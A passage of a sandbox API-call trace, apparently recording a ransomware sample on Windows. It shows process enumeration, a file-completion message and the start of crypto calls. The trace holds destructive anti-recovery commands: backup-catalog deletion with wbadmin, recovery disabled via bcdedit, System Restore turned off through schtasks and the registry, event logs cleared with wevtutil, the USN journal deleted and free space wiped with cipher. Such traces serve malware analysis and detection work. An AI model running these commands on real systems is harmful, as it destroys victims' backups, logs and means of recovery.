lpSrch="cipher.exe") returned 0x0 [0098.560] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.561] StrStrIA (lpFirst="taskhostw.exe", lpSrch="cipher.exe") returned 0x0 [0098.561] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0098.561] StrStrIA (lpFirst="explorer.exe", lpSrch="cipher.exe") returned 0x0 [0098.561] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0098.562] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="cipher.exe") returned 0x0 [0098.562] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0098.562] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="cipher.exe") returned 0x0 [0098.562] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0098.563] StrStrIA (lpFirst="Memory Compression", lpSrch="cipher.exe") returned 0x0 [0098.563] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0098.563] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="cipher.exe") returned 0x0 [0098.563] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0098.564] StrStrIA (lpFirst="SearchUI.exe", lpSrch="cipher.exe") returned 0x0 [0098.564] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0098.564] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="cipher.exe") returned 0x0 [0098.564] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0098.565] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="cipher.exe") returned 0x0 [0098.565] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0098.565] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="cipher.exe") returned 0x0 [0098.565] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.566] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.566] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.566] StrStrIA (lpFirst="taskhostw.exe", lpSrch="cipher.exe") returned 0x0 [0098.566] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0098.567] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="cipher.exe") returned 0x0 [0098.567] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0098.567] StrStrIA (lpFirst="conhost.exe", lpSrch="cipher.exe") returned 0x0 [0098.567] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0098.568] StrStrIA (lpFirst="mspusf.exe", lpSrch="cipher.exe") returned 0x0 [0098.568] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0098.568] StrStrIA (lpFirst="conhost.exe", lpSrch="cipher.exe") returned 0x0 [0098.568] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0098.569] StrStrIA (lpFirst="sppsvc.exe", lpSrch="cipher.exe") returned 0x0 [0098.569] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0098.569] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="cipher.exe") returned 0x0 [0098.569] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0098.570] StrStrIA (lpFirst="TiWorker.exe", lpSrch="cipher.exe") returned 0x0 [0098.570] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.570] StrStrIA (lpFirst="taskhostw.exe", lpSrch="cipher.exe") returned 0x0 [0098.570] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95f544, th32DefaultHeapID=0x63, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0098.571] CloseHandle (hObject=0x468) returned 1 [0098.571] GetLogicalDriveStringsW (in: nBufferLength=0x104, lpBuffer=0x95fbcc | out: lpBuffer="C:\\") returned 0x4 [0098.571] wsprintfW (in: param_1=0x95f7bc, param_2="/w:%s" | out: param_1="/w:C:") returned 5 [0098.571] GetSystemDirectoryW (in: lpBuffer=0x95f9c4, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0098.571] ShellExecuteExW (in: pExecInfo=0x95fdd4*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="cipher.exe", lpParameters="/w:C:", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fdd4*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="cipher.exe", lpParameters="/w:C:", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0098.661] GetVersionExW (in: lpVersionInformation=0x95fc08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x95fc08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0098.661] GetNativeSystemInfo (in: lpSystemInfo=0x95fb24 | out: lpSystemInfo=0x95fb24*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0098.661] GetCurrentProcess () returned 0xffffffff [0098.661] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x95fb54 | out: Wow64Process=0x95fb54) returned 1 [0098.661] Wow64DisableWow64FsRedirection (in: OldValue=0x95fb6c | out: OldValue=0x95fb6c*=0x0) returned 1 [0098.661] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0098.661] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wbadmin.exe", lpParameters="delete catalog -quiet", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wbadmin.exe", lpParameters="delete catalog -quiet", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0098.683] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0098.683] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="bcdedit.exe", lpParameters="/set {default} recoveryenabled no", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="bcdedit.exe", lpParameters="/set {default} recoveryenabled no", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0098.803] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0098.803] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="bcdedit.exe", lpParameters="/set {default} bootstatuspolicy ignoreallfailures", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="bcdedit.exe", lpParameters="/set {default} bootstatuspolicy ignoreallfailures", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0098.903] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0098.903] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0099.070] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0099.070] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl Application", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl Application", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0099.466] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0099.466] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl System", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl System", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0099.795] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0099.795] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl Setup", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl Setup", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0099.969] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0099.969] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl Security", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="cl Security", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0100.147] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0100.147] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="sl Security /e:false", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="wevtutil.exe", lpParameters="sl Security /e:false", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0100.701] GetSystemDirectoryW (in: lpBuffer=0x95fc08, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0100.701] ShellExecuteExW (in: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="fsutil.exe", lpParameters="usn deletejournal /D C:", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x95fb74*(cbSize=0x3c, fMask=0x100000, hwnd=0x0, lpVerb=0x0, lpFile="fsutil.exe", lpParameters="usn deletejournal /D C:", lpDirectory="C:\\WINDOWS\\system32", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0100.892] SHRegSetUSValueA (in: pszSubKey="SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore", pszValue="DisableConfig", dwType=0x4, pvData=0x95fb70*=0x1, cbData=0x4, dwFlags=0x4 | out: pvData=0x95fb70*=0x1) returned 0x0 [0100.893] SHRegSetUSValueA (in: pszSubKey="SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore", pszValue="DisableSR", dwType=0x4, pvData=0x95fb70*=0x1, cbData=0x4, dwFlags=0x4 | out: pvData=0x95fb70*=0x1) returned 0x0 [0100.894] SHRegSetUSValueA (in: pszSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", pszValue="DisableConfig", dwType=0x4, pvData=0x95fb70*=0x1, cbData=0x4, dwFlags=0x4 | out: pvData=0x95fb70*=0x1) returned 0x0 [0100.894] SHRegSetUSValueA (in: pszSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", pszValue="DisableSR", dwType=0x4, pvData=0x95fb70*=0x1, cbData=0x4, dwFlags=0x4 | out: pvData=0x95fb70*=0x1) returned 0x0 [0100.894] GetTickCount () returned 0x115baff [0100.894] GetLastError () returned 0x8000000a [0100.894] lstrlenA (lpString="Complete (+%u (%u) files done) [%s]\nWork time: %d:%02d:%02d\n") returned 60 [0100.894] GetProcessHeap () returned 0xe30000 [0100.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2bd) returned 0x68323f8 [0100.894] wvnsprintfA (in: pszDest=0x68323f8, cchDest=572, pszFmt="Complete (+%u (%u) files done) [%s]\nWork time: %d:%02d:%02d\n", arglist=0x95fe28 | out: pszDest="Complete (+404 (237) files done) [NQDPDE]\nWork time: 0:00:46\n") returned 61 [0100.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0100.895] WriteFile (in: hFile=0x90, lpBuffer=0x68323f8*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x95fe10, lpOverlapped=0x0 | out: lpBuffer=0x68323f8*, lpNumberOfBytesWritten=0x95fe10*=0x3d, lpOverlapped=0x0) returned 1 [0101.048] FlushFileBuffers (hFile=0x90) returned 0 [0101.054] GetProcessHeap () returned 0xe30000 [0101.054] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68323f8 | out: hHeap=0xe30000) returned 1 [0101.054] SetLastError (dwErrCode=0x8000000a) [0101.054] GetTickCount () returned 0x115bb9c [0101.054] GetProcessHeap () returned 0xe30000 [0101.054] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0x6842668 [0101.055] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0x6842668, lpcbData=0x95e8bc*=0x2000 | out: lpType=0x0, lpData=0x6842668*=0x50, lpcbData=0x95e8bc*=0x3d8) returned 0x0 [0101.056] GetProcessHeap () returned 0xe30000 [0101.056] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6842668 | out: hHeap=0xe30000) returned 1 [0101.056] GetTickCount () returned 0x115bb9c [0101.056] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0101.056] GetCurrentProcess () returned 0xffffffff [0101.056] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0101.056] CryptAcquireContextA (in: phProv=0x95e8b8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x95e8b8*=0xed4bb8) returned 1 [0101.057] CryptCreateHash (in: hProv=0xed4bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x95e8bc | out: phHash=0x95e8bc) returned 1 [0101.057] CryptHashData (hHash=0xec1970, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0101.057] CryptGetHashParam (in: hHash=0xec1970, dwParam=0x4, pbData=0x95e8b4, pdwDataLen=0x95e8b0, dwFlags=0x0 | out: pbData=0x95e8b4, pdwDataLen=0x95e8b0) returned 1 [0101.057] CryptGetHashParam (in: hHash=0xec1970, dwParam=0x2, pbData=0x95e8d8, pdwDataLen=0x95e8b4, dwFlags=0x0 | out: pbData=0x95e8d8, pdwDataLen=0x95e8b4) returned 1 [0101.057] CryptDestroyHash (hHash=0xec1970) returned 1 [0101.057] CryptReleaseContext (hProv=0xed4bb8, dwFlags=0x0) returned 1 [0101.057] GetProcessHeap () returned 0xe30000 [0101.057] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0x6807db0 [0101.057] wnsprintfA (in: pszDest=0x6807db0, cchDest=4, pszFmt="%02x" | out: pszDest="be") returned 2 [0101.057] wnsprintfA (in: pszDest=0x6807db2, cchDest=4, pszFmt="%02x" | out: pszDest="9c") returned 2 [0101.057] wnsprintfA (in: pszDest=0x6807db4, cchDest=4, pszFmt="%02x" | out: pszDest="f3") returned 2 [0101.057] wnsprintfA (in: pszDest=0x6807db6, cchDest=4, pszFmt="%02x" | out: pszDest="aa") returned 2 [0101.057] wnsprintfA (in: pszDest=0x6807db8, cchDest=4, pszFmt="%02x" | out: pszDest="ac") returned 2 [0101.057] wnsprintfA (in: pszDest=0x6807dba, cchDest=4, pszFmt="%02x" | out: pszDest="72") returned 2 [0101.057] wnsprintfA (in: pszDest=0x6807dbc, cchDest=4, pszFmt="%02x" | out: pszDest="6a") returned 2 [0101.057] wnsprintfA (in: pszDest=0x6807dbe, cchDest=4, pszFmt="%02x" | out: pszDest="b1") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dc0, cchDest=4, pszFmt="%02x" | out: pszDest="a2") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dc2, cchDest=4, pszFmt="%02x" | out: pszDest="df") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dc4, cchDest=4, pszFmt="%02x" | out: pszDest="32") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dc6, cchDest=4, pszFmt="%02x" | out: pszDest="0a") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dc8, cchDest=4, pszFmt="%02x" | out: pszDest="01") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dca, cchDest=4, pszFmt="%02x" | out: pszDest="fd") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dcc, cchDest=4, pszFmt="%02x" | out: pszDest="b2") returned 2 [0101.058] wnsprintfA (in: pszDest=0x6807dce, cchDest=4, pszFmt="%02x" | out: pszDest="ad") returned 2 [0101.058] CryptAcquireContextW (in: phProv=0x95e63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x95e63c*=0xed4f70) returned 1 [0101.058] CryptGenRandom (in: hProv=0xed4f70, dwLen=0x80, pbBuffer=0x95e650 | out: pbBuffer=0x95e650) returned 1 [0101.058] CryptReleaseContext (hProv=0xed4f70, dwFlags=0x0) returned 1 [0101.058] GetProcessHeap () returned 0xe30000 [0101.058] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xefb5b0 [0101.058] GetProcessHeap () returned 0xe30000 [0101.058] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825a88 [0101.059] GetProcessHeap () returned 0xe30000 [0101.059] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xefb328 [0101.059] GetProcessHeap () returned 0xe30000 [0101.059] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6822e08 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xefb328 | out: hHeap=0xe30000) returned 1 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6823098 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap 